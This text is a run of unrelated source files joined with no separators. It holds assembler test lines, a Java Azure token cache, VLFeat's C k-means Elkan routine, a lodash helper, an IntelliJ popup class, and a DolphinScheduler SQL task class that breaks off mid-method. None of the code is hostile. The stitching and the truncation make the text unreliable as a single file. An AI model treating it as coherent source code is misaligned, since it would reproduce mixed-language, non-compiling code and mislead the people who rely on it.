// CHECK-ENCODING: [0xe0,0xbc,0x20,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 bc 20 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.security.keyvault.administration.implementation;
import com.azure.core.credential.AccessToken;
import com.azure.core.credential.TokenRequestContext;
import reactor.core.publisher.FluxSink;
import reactor.core.publisher.Mono;
import reactor.core.publisher.ReplayProcessor;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.function.Function;
/**
* A token cache that supports caching a token and refreshing it.
*/
class ScopeTokenCache {
private final AtomicBoolean wip;
private AccessToken cache;
private final ReplayProcessor<AccessToken> emitterProcessor = ReplayProcessor.create(1);
private final FluxSink<AccessToken> sink = emitterProcessor.sink(FluxSink.OverflowStrategy.BUFFER);
private final Function<TokenRequestContext, Mono<AccessToken>> getNew;
private TokenRequestContext request;
/**
     * Creates an instance of ScopeTokenCache.
*
* @param getNew a method to get a new token
*/
ScopeTokenCache(Function<TokenRequestContext, Mono<AccessToken>> getNew) {
this.wip = new AtomicBoolean(false);
this.getNew = getNew;
}
public void setTokenRequest(TokenRequestContext request) {
this.request = request;
}
/**
* Asynchronously get a token from either the cache or replenish the cache with a new token.
* @return a Publisher that emits an AccessToken
*/
public Mono<AccessToken> getToken() {
if (cache != null && !cache.isExpired()) {
return Mono.just(cache);
}
return Mono.defer(() -> {
if (!wip.getAndSet(true)) {
return getNew.apply(request).doOnNext(ac -> cache = ac)
.doOnNext(sink::next)
.doOnError(sink::error)
.doOnTerminate(() -> wip.set(false));
} else {
return emitterProcessor.next();
}
});
}
}
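// Illustrative usage sketch (hypothetical names; not part of the original
// class). A caller typically wires the cache to a TokenCredential and lets it
// serve the cached token until expiry:
//
//   ScopeTokenCache cache = new ScopeTokenCache(credential::getToken);
//   cache.setTokenRequest(
//       new TokenRequestContext().addScopes("https://vault.azure.net/.default"));
//   Mono<AccessToken> token = cache.getToken();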
/** @file ikmeans_elkan.tc
** @brief Integer K-Means - Elkan Algorithm - Definition
** @author Andrea Vedaldi
**/
/*
Copyright (C) 2007-12 Andrea Vedaldi and Brian Fulkerson.
All rights reserved.
This file is part of the VLFeat library and is made available under
the terms of the BSD license (see the COPYING file).
*/
#include "mathop.h"
/** @internal
** Update inter cluster distance table.
**/
static void
vl_ikm_elkan_update_inter_dist (VlIKMFilt *f)
{
vl_uindex i, k, kp ;
/* inter cluster distances */
for(k = 0 ; k < f->K ; ++ k) {
for(kp = 0 ; kp < f->K ; ++ kp) {
vl_ikmacc_t dist = 0 ;
if (k != kp) {
for(i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = f->centers [kp * f->M + i] - f->centers [k * f->M + i] ;
dist += delta * delta ;
}
}
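      /* store (d(k,kp)/2)^2 = d(k,kp)^2 / 4: distances here are squared, so
         halving the distance corresponds to a right shift by two bits */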
f->inter_dist [k * f->K + kp] = f->inter_dist [kp * f->K + k] = dist >> 2 ;
}
}
}
/** @internal
** @brief Helper function to initialize filter for Triangle algorithm
** @param f filter.
**/
static void
vl_ikm_init_elkan (VlIKMFilt *f)
{
if (f->inter_dist) {
vl_free (f-> inter_dist) ;
}
f->inter_dist = vl_malloc (sizeof(*f->inter_dist) * f->K * f->K) ;
vl_ikm_elkan_update_inter_dist (f) ;
}
/** @internal
** @brief Elkan algorithm
** @param f IKM quantizer.
** @param data Data to quantize.
** @param N Number of data elements.
**/
static int
vl_ikm_train_elkan (VlIKMFilt* f, vl_uint8 const* data, vl_size N)
{
/* REMARK !! All distances are squared !! */
vl_uindex i,pass,c,cp,x,cx ;
vl_size dist_calc = 0 ;
vl_ikmacc_t dist ;
vl_ikmacc_t *m_pt = vl_malloc(sizeof(*m_pt) * f->M * f->K) ; /* new centers (temp) */
  vl_ikmacc_t *u_pt = vl_malloc(sizeof(*u_pt) * N) ; /* upper bound (may be strict) */
char *r_pt = vl_malloc(sizeof(*r_pt) * 1 * N) ; /* flag: u is strict */
vl_ikmacc_t *s_pt = vl_malloc(sizeof(*s_pt) * f->K) ; /* min cluster dist. */
vl_ikmacc_t *l_pt = vl_malloc(sizeof(*l_pt) * N * f->K) ; /* lower bound */
vl_ikmacc_t *d_pt = f->inter_dist ; /* half inter clst dist */
vl_uint32 *asgn = vl_malloc (sizeof(*asgn) * N) ;
  vl_uint32 *counts = vl_malloc (sizeof(*counts) * N) ; /* per-cluster sizes (only f->K entries used) */
int done = 0 ;
/* do passes */
vl_ikm_elkan_update_inter_dist (f) ;
/* init */
memset(l_pt, 0, sizeof(*l_pt) * N * f->K) ;
memset(u_pt, 0, sizeof(*u_pt) * N) ;
memset(r_pt, 0, sizeof(*r_pt) * N) ;
for(x = 0 ; x < N ; ++x) {
vl_ikmacc_t best_dist ;
/* do first cluster `by hand' */
dist_calc ++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[x * f->M + i] - f->centers[i] ;
dist += delta*delta ;
}
cx = 0 ;
best_dist = dist ;
l_pt[x] = dist ;
/* do other clusters */
for(c = 1 ; c < f->K ; ++c) {
if(d_pt[f->K * cx + c] < best_dist) {
/* might need to be updated */
dist_calc++ ;
for(dist=0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta =
(vl_ikmacc_t)data[x * f->M + i]
- f->centers[c * f->M + i] ;
dist += delta * delta ;
}
/* lower bound */
l_pt[N*c + x] = dist ;
if(dist < best_dist) {
best_dist = dist ;
cx = c ;
}
}
}
asgn[x] = (vl_uint32)cx ;
u_pt[x] = best_dist ;
}
/* --------------------------------------------------------------------
* Passes
* ------------------------------------------------------------------ */
for (pass = 0 ; 1 ; ++ pass) {
/* ------------------------------------------------------------------
* Re-calculate means
* ---------------------------------------------------------------- */
memset(m_pt, 0, sizeof(*m_pt) * f->M * f->K) ;
memset(counts, 0, sizeof(*counts) * f->K) ;
/* accumulate */
for(x = 0 ; x < N ; ++x) {
int cx = asgn[x] ;
++ counts[ cx ] ;
for(i = 0 ; i < f->M ; ++i) {
m_pt[cx * f->M + i] += data[x * f->M + i] ;
}
}
/* normalize */
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t n = counts[c] ;
if(n > 0) {
for(i = 0 ; i < f->M ; ++i) {
m_pt[c * f->M + i] /= n ;
}
} else {
for(i = 0 ; i < f->M ; ++i) {
/*m_pt[c*M + i] = data[pairs_pt[c].j*M + i] ;*/
}
}
}
/* ------------------------------------------------------------------
* Update bounds
* --------------------------------------------------------------- */
for(c = 0 ; c < f->K ; ++c) {
/* distance d(m(c),c) and update c */
dist_calc++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta =
(vl_ikmacc_t)m_pt[c * f->M + i]
- f->centers[c * f->M + i] ;
f->centers[c * f->M + i] = m_pt[c * f->M +i] ;
dist += delta * delta ;
}
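      /* Elkan bound maintenance (all quantities squared): if center c moved
         by squared distance `dist`, the triangle inequality gives
         sqrt(l') >= sqrt(l) - sqrt(dist) and sqrt(u') <= sqrt(u) + sqrt(dist).
         The `+1` terms below keep the integer square roots conservative, so
         the bounds remain valid after truncation. */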
for(x = 0 ; x < N ; ++x) {
vl_ikmacc_t lxc = l_pt[c * N + x] ;
vl_uindex cx = (int) asgn[x] ;
/* lower bound */
if(dist < lxc) {
lxc = (vl_ikmacc_t) (lxc + dist - 2*(vl_fast_sqrt_ui64(lxc)+1)*(vl_fast_sqrt_ui64(dist)+1)) ;
} else {
lxc = 0 ;
}
l_pt[c*N + x] = lxc ;
/* upper bound */
if(c == cx) {
vl_ikmacc_t ux = u_pt[x] ;
u_pt[x] = (vl_ikmacc_t) (ux + dist + 2 * (vl_fast_sqrt_ui64(ux)+1)*(vl_fast_sqrt_ui64(dist)+1)) ;
r_pt[x] = 1 ;
}
}
}
/* inter cluster distances */
for(c = 0 ; c < f->K ; ++c) {
for(cp = 0 ; cp < f->K ; ++cp) {
dist = 0 ;
if( c != cp ) {
dist_calc++;
for(i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = f->centers[cp * f->M + i] - f->centers[ c * f->M + i] ;
dist += delta*delta ;
}
}
d_pt[c * f->K + cp] = d_pt[cp * f->K + c] = dist>>2 ;
}
}
/* closest cluster distance */
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t best_dist = VL_IKMACC_MAX ;
for(cp = 0 ; cp < f->K ; ++cp) {
dist = d_pt[c * f->K + cp] ;
if(c != cp && dist < best_dist) best_dist = dist ;
}
s_pt[c] = best_dist >> 2 ;
}
/* ------------------------------------------------------------------
* Assign data to centers
* ---------------------------------------------------------------- */
done = 1 ;
for(x = 0 ; x < N ; ++x) {
vl_uindex cx = (vl_uindex) asgn[x] ;
vl_ikmacc_t ux = u_pt[x] ;
/* ux is an upper bound of the distance of x to its
         current center cx. s_pt[cx] is half of the minimum distance
between the cluster cx and any other cluster center. If
ux <= s_pt[cx] then x remains attached to cx. */
if(ux <= s_pt[cx]) continue ;
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t dist = 0 ;
/* so x might need to be re-associated from cx to c. We can
exclude c if
1 - cx = c (trivial) or
2 - u(x) <= l(x,c) as this implies d(x,cx) <= d(x,c) or
3 - u(x) <= d(cx,c)/2 as this implies d(x,cx) <= d(x,c).
*/
if(c == cx ||
ux <= l_pt[N * c + x] ||
ux <= d_pt[f->K * c + cx])
continue ;
/* we need to make a true comparison */
/* if u_pt[x] is stale (i.e. not strictly equal to
           d(x,cx)), then re-calculate it. */
if( r_pt[x] ) {
dist_calc++;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[x * f->M + i] - f->centers[cx * f->M + i] ;
dist += delta*delta ;
}
ux = u_pt[x] = dist ;
r_pt[x] = 0 ;
/* now that u_pt[x] is updated, we check the conditions
again */
if(
ux <= l_pt[N * c + x] ||
ux <= d_pt[f->K * c + cx] )
continue ;
}
/* no way... we need to compute the distance d(x,c) */
dist_calc++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[ x * f->M + i] - f->centers[c * f->M + i] ;
dist += delta * delta ;
}
l_pt[N * c + x] = dist ;
if (dist < ux) {
ux = u_pt[x] = dist ;
/* r_pt[x] already 0 */
asgn[x] = (vl_uint32)c ;
done = 0 ;
}
}
} /* next data point */
/* stopping condition */
if(done || pass == f->max_niters) {
break ;
}
}
vl_free (counts) ;
vl_free (asgn) ;
vl_free (l_pt) ;
vl_free (s_pt) ;
vl_free (r_pt) ;
vl_free (u_pt) ;
vl_free (m_pt) ;
if (f-> verb) {
VL_PRINTF ("ikm: Elkan algorithm: total iterations: %d\n", pass) ;
VL_PRINTF ("ikm: Elkan algorithm: distance calculations: %d (speedup: %.2f)\n",
dist_calc, (float)N * f->K * (pass+2) / dist_calc - 1) ;
}
return 0 ;
}
/** @internal
** @brief Elkan algorithm
** @param f IKM quantizer.
** @param asgn Assignment of data to centers (out).
** @param data Data to quantize.
** @param N Number of data elements.
**/
static void
vl_ikm_push_elkan (VlIKMFilt *f, vl_uint32 *asgn, vl_uint8 const *data, vl_size N)
{
vl_uindex i,c,cx,x ;
vl_size dist_calc = 0 ;
vl_ikmacc_t dist, best_dist ;
vl_ikmacc_t *d_pt = f->inter_dist ;
/* assign data to centers */
for(x = 0 ; x < N ; ++x) {
best_dist = VL_IKMACC_MAX ;
cx = 0 ;
for(c = 0 ; c < f->K ; ++c) {
if(d_pt[f->K * cx + c] < best_dist) {
/* might need to be updated */
dist_calc ++ ;
for(dist=0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = data[x * f->M + i] - f->centers[c * f->M + i] ;
dist += delta * delta ;
}
        /* keep the best (exact) distance seen so far */
if(dist < best_dist) {
best_dist = dist ;
cx = c ;
}
}
}
asgn[x] = (vl_uint32)cx ;
}
}
/*
* Local Variables: *
* mode: C *
* End: *
*/
var ListCache = require('./_ListCache'),
MapCache = require('./_MapCache');
/** Used as the size to enable large array optimizations. */
var LARGE_ARRAY_SIZE = 200;
/**
* Sets the stack `key` to `value`.
*
* @private
* @name set
* @memberOf Stack
* @param {string} key The key of the value to set.
* @param {*} value The value to set.
* @returns {Object} Returns the stack cache instance.
*/
function stackSet(key, value) {
var cache = this.__data__;
if (cache instanceof ListCache && cache.__data__.length == LARGE_ARRAY_SIZE) {
cache = this.__data__ = new MapCache(cache.__data__);
}
cache.set(key, value);
return this;
}
module.exports = stackSet;
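// Illustrative usage (hypothetical; lodash wires this up internally as
// `Stack.prototype.set`):
//
//   var Stack = require('./_Stack');
//   var stack = new Stack();
//   stack.set('key', 'value'); // upgrades ListCache -> MapCache past 200 entries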
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.ui;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.ui.popup.Balloon;
import com.intellij.openapi.ui.popup.BalloonBuilder;
import com.intellij.openapi.ui.popup.JBPopupFactory;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.NlsContexts;
import com.intellij.openapi.util.text.HtmlBuilder;
import com.intellij.openapi.util.text.HtmlChunk;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.ui.awt.RelativePoint;
import com.intellij.ui.scale.JBUIScale;
import com.intellij.util.ui.PositionTracker;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.event.HyperlinkListener;
import java.awt.*;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
/**
* @author Konstantin Bulenkov
*/
public final class GotItMessage {
@NotNull private final @NlsContexts.PopupContent String myTitle;
@NotNull private final @NlsContexts.PopupContent String myMessage;
private Disposable myDisposable;
private Runnable myCallback;
private HyperlinkListener myHyperlinkListener = BrowserHyperlinkListener.INSTANCE;
private boolean myShowCallout = true;
private GotItMessage(@NlsContexts.PopupContent @NotNull String title, @NlsContexts.PopupContent @NotNull String message) {
myTitle = title;
    myMessage =
      new HtmlBuilder()
        .append(HtmlChunk.div("font-family: " + UIUtil.getLabelFont().getFontName() + "; font-size: " +
                              JBUIScale.scale(12) + "pt;")
                  .attr("align", "center")
                  .addRaw(StringUtil.replace(message, "\n", "<br>")))
        .wrapWithHtmlBody()
        .toString();
}
public static GotItMessage createMessage(@NotNull @NlsContexts.PopupTitle String title, @NotNull @NlsContexts.PopupContent String message) {
return new GotItMessage(title, message);
}
public GotItMessage setDisposable(Disposable disposable) {
myDisposable = disposable;
return this;
}
public GotItMessage setCallback(@Nullable Runnable callback) {
myCallback = callback;
return this;
}
public GotItMessage setHyperlinkListener(@Nullable HyperlinkListener hyperlinkListener) {
myHyperlinkListener = hyperlinkListener;
return this;
}
public GotItMessage setShowCallout(boolean showCallout) {
myShowCallout = showCallout;
return this;
}
public void show(@NotNull RelativePoint point, @NotNull Balloon.Position position) {
show(new PositionTracker.Static<>(point), position);
}
public void show(@NotNull PositionTracker<Balloon> tracker, @NotNull Balloon.Position position) {
if (myDisposable != null && Disposer.isDisposed(myDisposable)) {
return;
}
final GotItPanel panel = new GotItPanel();
panel.myTitle.setText(myTitle);
panel.myMessage.setText(myMessage);
if (myHyperlinkListener != null) {
panel.myMessage.addHyperlinkListener(myHyperlinkListener);
}
panel.myButton.setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
final BalloonBuilder builder = JBPopupFactory.getInstance().createBalloonBuilder(panel.myRoot);
if (myDisposable != null) {
builder.setDisposable(myDisposable);
}
final Balloon balloon = builder
.setFillColor(UIUtil.getListBackground())
.setHideOnClickOutside(false)
.setHideOnAction(false)
.setHideOnFrameResize(false)
.setHideOnKeyOutside(false)
.setShowCallout(myShowCallout)
.setBlockClicksThroughBalloon(true)
.createBalloon();
panel.myButton.addMouseListener(new MouseAdapter() {
@Override
public void mouseClicked(MouseEvent e) {
balloon.hide();
if (myCallback != null) {
myCallback.run();
}
}
});
balloon.show(tracker, position);
}
}
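// Illustrative usage sketch (hypothetical component and point; not part of
// the original class):
//
//   GotItMessage.createMessage("New feature", "Press Alt+Enter to apply it.")
//     .setDisposable(parentDisposable)
//     .show(new RelativePoint(component, new Point(0, 0)), Balloon.Position.below);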
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dolphinscheduler.server.worker.task.sql;
import com.fasterxml.jackson.databind.node.ArrayNode;
import com.fasterxml.jackson.databind.node.ObjectNode;
import org.apache.commons.lang.StringUtils;
import org.apache.dolphinscheduler.alert.utils.MailUtils;
import org.apache.dolphinscheduler.common.Constants;
import org.apache.dolphinscheduler.common.enums.*;
import org.apache.dolphinscheduler.common.process.Property;
import org.apache.dolphinscheduler.common.task.AbstractParameters;
import org.apache.dolphinscheduler.common.task.sql.SqlBinds;
import org.apache.dolphinscheduler.common.task.sql.SqlParameters;
import org.apache.dolphinscheduler.common.task.sql.SqlType;
import org.apache.dolphinscheduler.common.utils.*;
import org.apache.dolphinscheduler.dao.AlertDao;
import org.apache.dolphinscheduler.dao.datasource.BaseDataSource;
import org.apache.dolphinscheduler.dao.datasource.DataSourceFactory;
import org.apache.dolphinscheduler.dao.entity.User;
import org.apache.dolphinscheduler.server.entity.SQLTaskExecutionContext;
import org.apache.dolphinscheduler.server.entity.TaskExecutionContext;
import org.apache.dolphinscheduler.server.utils.ParamUtils;
import org.apache.dolphinscheduler.server.utils.UDFUtils;
import org.apache.dolphinscheduler.server.worker.task.AbstractTask;
import org.apache.dolphinscheduler.service.bean.SpringApplicationContext;
import org.slf4j.Logger;
import java.sql.*;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import static org.apache.dolphinscheduler.common.Constants.*;
import static org.apache.dolphinscheduler.common.enums.DbType.HIVE;
/**
* sql task
*/
public class SqlTask extends AbstractTask {
/**
* sql parameters
*/
private SqlParameters sqlParameters;
/**
* alert dao
*/
private AlertDao alertDao;
/**
* base datasource
*/
private BaseDataSource baseDataSource;
/**
* taskExecutionContext
*/
private TaskExecutionContext taskExecutionContext;
/**
* default query sql limit
*/
private static final int LIMIT = 10000;
public SqlTask(TaskExecutionContext taskExecutionContext, Logger logger) {
super(taskExecutionContext, logger);
this.taskExecutionContext = taskExecutionContext;
logger.info("sql task params {}", taskExecutionContext.getTaskParams());
this.sqlParameters = JSONUtils.parseObject(taskExecutionContext.getTaskParams(), SqlParameters.class);
if (!sqlParameters.checkParameters()) {
throw new RuntimeException("sql task params is not valid");
}
this.alertDao = SpringApplicationContext.getBean(AlertDao.class);
}
@Override
public void handle() throws Exception {
// set the name of the current thread
String threadLoggerInfoName = String.format(Constants.TASK_LOG_INFO_FORMAT, taskExecutionContext.getTaskAppId());
Thread.currentThread().setName(threadLoggerInfoName);
logger.info("Full sql parameters: {}", sqlParameters);
logger.info("sql type : {}, datasource : {}, sql : {} , localParams : {},udfs : {},showType : {},connParams : {}",
sqlParameters.getType(),
sqlParameters.getDatasource(),
sqlParameters.getSql(),
sqlParameters.getLocalParams(),
sqlParameters.getUdfs(),
sqlParameters.getShowType(),
sqlParameters.getConnParams());
try {
SQLTaskExecutionContext sqlTaskExecutionContext = taskExecutionContext.getSqlTaskExecutionContext();
// load class
DataSourceFactory.loadClass(DbType.valueOf(sqlParameters.getType()));
// get datasource
baseDataSource = DataSourceFactory.getDatasource(DbType.valueOf(sqlParameters.getType()),
sqlTaskExecutionContext.getConnectionParams());
// ready to execute SQL and parameter entity Map
SqlBinds mainSqlBinds = getSqlAndSqlParamsMap(sqlParameters.getSql());
List<SqlBinds> preStatementSqlBinds = Optional.ofNullable(sqlParameters.getPreStatements())
.orElse(new ArrayList<>())
.stream()
.map(this::getSqlAndSqlParamsMap)
.collect(Collectors.toList());
List<SqlBinds> postStatementSqlBinds = Optional.ofNullable(sqlParameters.getPostStatements())
.orElse(new ArrayList<>())
.stream()
.map(this::getSqlAndSqlParamsMap)
.collect(Collectors.toList());
List<String> createFuncs = UDFUtils.createFuncs(sqlTaskExecutionContext.getUdfFuncTenantCodeMap(),
logger);
// execute sql task
executeFuncAndSql(mainSqlBinds, preStatementSqlBinds, postStatementSqlBinds, createFuncs);
setExitStatusCode(Constants.EXIT_CODE_SUCCESS);
} catch (Exception e) {
setExitStatusCode(Constants.EXIT_CODE_FAILURE);
logger.error("sql task error", e);
throw e;
}
}
/**
     * build the executable SQL string and its positional parameter map
     * @param sql the raw sql containing ${...} placeholders
     * @return SqlBinds
*/
private SqlBinds getSqlAndSqlParamsMap(String sql) {
Map<Integer,Property> sqlParamsMap = new HashMap<>();
StringBuilder sqlBuilder = new StringBuilder();
// find process instance by task id
Map<String, Property> paramsMap = ParamUtils.convert(ParamUtils.getUserDefParamsMap(taskExecutionContext.getDefinedParams()),
taskExecutionContext.getDefinedParams(),
sqlParameters.getLocalParametersMap(),
CommandType.of(taskExecutionContext.getCmdTypeIfComplement()),
taskExecutionContext.getScheduleTime());
        // assemble the SQL according to the final user-defined variables
if(paramsMap == null){
sqlBuilder.append(sql);
return new SqlBinds(sqlBuilder.toString(), sqlParamsMap);
}
if (StringUtils.isNotEmpty(sqlParameters.getTitle())){
String title = ParameterUtils.convertParameterPlaceholders(sqlParameters.getTitle(),
ParamUtils.convert(paramsMap));
logger.info("SQL title : {}",title);
sqlParameters.setTitle(title);
}
        // replace the time variables with $[yyyyMMdd...] expressions in the sql
        // for history runs and batch complement jobs
sql = ParameterUtils.replaceScheduleTime(sql, taskExecutionContext.getScheduleTime());
        // match ${...} placeholders (possibly quote-wrapped); $ and {} must be escaped in the regex
String rgex = "['\"]*\\$\\{(.*?)\\}['\"]*";
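        // e.g. "select * from t where id = ${id}" binds the value of `id` at
        // position 1 and is rewritten below to "select * from t where id = ?"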
setSqlParamsMap(sql, rgex, sqlParamsMap, paramsMap);
// replace the ${} of the SQL statement with the Placeholder
String formatSql = sql.replaceAll(rgex, "?");
sqlBuilder.append(formatSql);
        // print the replaced sql
printReplacedSql(sql, formatSql, rgex, sqlParamsMap);
return new SqlBinds(sqlBuilder.toString(), sqlParamsMap);
}
@Override
public AbstractParameters getParameters() {
return this.sqlParameters;
}
/**
* execute function and sql
* @param mainSqlBinds main sql binds
* @param preStatementsBinds pre statements binds
* @param postStatementsBinds post statements binds
* @param createFuncs create functions
*/
public void executeFuncAndSql(SqlBinds mainSqlBinds,
List<SqlBinds> preStatementsBinds,
List<SqlBinds> postStatementsBinds,
List<String> createFuncs){
Connection connection = null;
PreparedStatement stmt = null;
ResultSet resultSet = null;
try {
// if upload resource is HDFS and kerberos startup
CommonUtils.loadKerberosConf();
// create connection
connection = createConnection();
// create temp function
if (CollectionUtils.isNotEmpty(createFuncs)) {
createTempFunction(connection,createFuncs);
}
// pre sql
preSql(connection,preStatementsBinds);
stmt = prepareStatementAndBind(connection, mainSqlBinds);
// decide whether to executeQuery or executeUpdate based on sqlType
if (sqlParameters.getSqlType() == SqlType.QUERY.ordinal()) {
// query statements need to be convert to JsonArray and inserted into Alert to send
resultSet = stmt.executeQuery();
resultProcess(resultSet);
} else if (sqlParameters.getSqlType() == SqlType.NON_QUERY.ordinal()) {
// non query statement
stmt.executeUpdate();
}
postSql(connection,postStatementsBinds);
} catch (Exception e) {
logger.error("execute sql error",e);
throw new RuntimeException("execute sql error");
} finally {
close(resultSet,stmt,connection);
}
}
/**
* result process
*
* @param resultSet resultSet
* @throws Exception Exception
*/
private void resultProcess(ResultSet resultSet) throws Exception{
ArrayNode resultJSONArray = JSONUtils.createArrayNode();
ResultSetMetaData md = resultSet.getMetaData();
int num = md.getColumnCount();
int rowCount = 0;
while (rowCount < LIMIT && resultSet.next()) {
ObjectNode mapOfColValues = JSONUtils.createObjectNode();
for (int i = 1; i <= num; i++) {
mapOfColValues.set(md.getColumnLabel(i), JSONUtils.toJsonNode(resultSet.getObject(i)));
}
resultJSONArray.add(mapOfColValues);
rowCount++;
}
String result = JSONUtils.toJsonString(resultJSONArray);
logger.debug("execute sql : {}", result);
        sendAttachment(StringUtils.isNotEmpty(sqlParameters.getTitle()) ?
                sqlParameters.getTitle() : taskExecutionContext.getTaskName() + " query result sets",
                result);
}
/**
* pre sql
*
* @param connection connection
* @param preStatementsBinds preStatementsBinds
*/
private void preSql(Connection connection,
List<SqlBinds> preStatementsBinds) throws Exception{
for (SqlBinds sqlBind: preStatementsBinds) {
try (PreparedStatement pstmt = prepareStatementAndBind(connection, sqlBind)){
int result = pstmt.executeUpdate();
logger.info("pre statement execute result: {}, for sql: {}",result,sqlBind.getSql());
}
}
}
/**
* post sql
*
* @param connection connection
* @param postStatementsBinds postStatementsBinds
* @throws Exception
*/
private void postSql(Connection connection,
List<SqlBinds> postStatementsBinds) throws Exception{
for (SqlBinds sqlBind: postStatementsBinds) {
try (PreparedStatement pstmt = prepareStatementAndBind(connection, sqlBind)){
int result = pstmt.executeUpdate();
logger.info("post statement execute result: {},for sql: {}",result,sqlBind.getSql());
}
}
}
/**
* create temp function
*
* @param connection connection
* @param createFuncs createFuncs
* @throws Exception
*/
private void createTempFunction(Connection connection,
List<String> createFuncs) throws Exception{
try (Statement funcStmt = connection.createStatement()) {
for (String createFunc : createFuncs) {
logger.info("hive create function sql: {}", createFunc);
funcStmt.execute(createFunc);
}
}
}
/**
* create connection
*
* @return connection
* @throws Exception Exception
*/
private Connection createConnection() throws Exception{
// if hive , load connection params if exists
Connection connection = null;
if (HIVE == DbType.valueOf(sqlParameters.getType())) {
Properties paramProp = new Properties();
paramProp.setProperty(USER, baseDataSource.getUser());
paramProp.setProperty(PASSWORD, baseDataSource.getPassword());
Map<String, String> connParamMap = CollectionUtils.stringToMap(sqlParameters.getConnParams(),
SEMICOLON,
HIVE_CONF);
paramProp.putAll(connParamMap);
connection = DriverManager.getConnection(baseDataSource.getJdbcUrl(),
paramProp);
}else{
connection = DriverManager.getConnection(baseDataSource.getJdbcUrl(),
baseDataSource.getUser(),
baseDataSource.getPassword());
}
return connection;
}
/**
* close jdbc resource
*
* @param resultSet resultSet
* @param pstmt pstmt
* @param connection connection
*/
private void close(ResultSet resultSet,
PreparedStatement pstmt,
Connection connection){
if (resultSet != null){
try {
resultSet.close();
} catch (SQLException e) {
logger.error("close result set error : {}",e.getMessage(),e);
}
}
if (pstmt != null){
try {
pstmt.close();
} catch (SQLException e) {
logger.error("close prepared statement error : {}",e.getMessage(),e);
}
}
if (connection != null){
try {
connection.close();
} catch (SQLException e) {
logger.error("close connection error : {}",e.getMessage(),e);
}
}
}
/**
* preparedStatement bind
* @param connection connection
* @param sqlBinds sqlBinds
* @return PreparedStatement
* @throws Exception Exception
*/
private PreparedStatement prepareStatementAndBind(Connection connection, SqlBinds sqlBinds) throws Exception {
// is the timeout set
boolean timeoutFlag = TaskTimeoutStrategy.of(taskExecutionContext.getTaskTimeoutStrategy()) == TaskTimeoutStrategy.FAILED ||
TaskTimeoutStrategy.of(taskExecutionContext.getTaskTimeoutStrategy()) == TaskTimeoutStrategy.WARNFAILED;
PreparedStatement stmt = connection.prepareStatement(sqlBinds.getSql());
if(timeoutFlag){
stmt.setQueryTimeout(taskExecutionContext.getTaskTimeout());
}
Map<Integer, Property> params = sqlBinds.getParamsMap();
if(params != null) {
for (Map.Entry<Integer, Property> entry : params.entrySet()) {
Property prop = entry.getValue();
ParameterUtils.setInParameter(entry.getKey(), stmt, prop.getType(), prop.getValue());
}
}
logger.info("prepare statement replace sql : {} ", stmt);
return stmt;
}
/**
* send mail as an attachment
* @param title title
* @param content content
*/
public void sendAttachment(String title,String content){
List<User> users = alertDao.queryUserByAlertGroupId(taskExecutionContext.getSqlTaskExecutionContext().getWarningGroupId());
// receiving group list
List<String> receiversList = new ArrayList<>();
for(User user:users){
receiversList.add(user.getEmail().trim());
}
// custom receiver
String receivers = sqlParameters.getReceivers();
if (StringUtils.isNotEmpty(receivers)){
String[] splits = receivers.split(COMMA);
for (String receiver : splits){
receiversList.add(receiver.trim());
}
}
// copy list
List<String> receiversCcList = new ArrayList<>();
        // custom CC recipients
String receiversCc = sqlParameters.getReceiversCc();
if (StringUtils.isNotEmpty(receiversCc)){
String[] splits = receiversCc.split(COMMA);
for (String receiverCc : splits){
receiversCcList.add(receiverCc.trim());
}
}
String showTypeName = sqlParameters.getShowType().replace(COMMA,"").trim();
if(EnumUtils.isValidEnum(ShowType.class,showTypeName)){
Map<String, Object> mailResult = MailUtils.sendMails(receiversList,
receiversCcList, title, content, ShowType.valueOf(showTypeName).getDescp());
if(!(boolean) mailResult.get(STATUS)){
throw new RuntimeException("send mail failed!");
}
}else{
logger.error("showType: {} is not valid " ,showTypeName);
throw new RuntimeException(String.format("showType: %s is not valid ",showTypeName));
}
}
/**
* regular expressions match the contents between two specified strings
* @param content content
* @param rgex rgex
* @param sqlParamsMap sql params map
* @param paramsPropsMap params props map
*/
public void setSqlParamsMap(String content, String rgex, Map<Integer,Property> sqlParamsMap, Map<String,Property> paramsPropsMap){
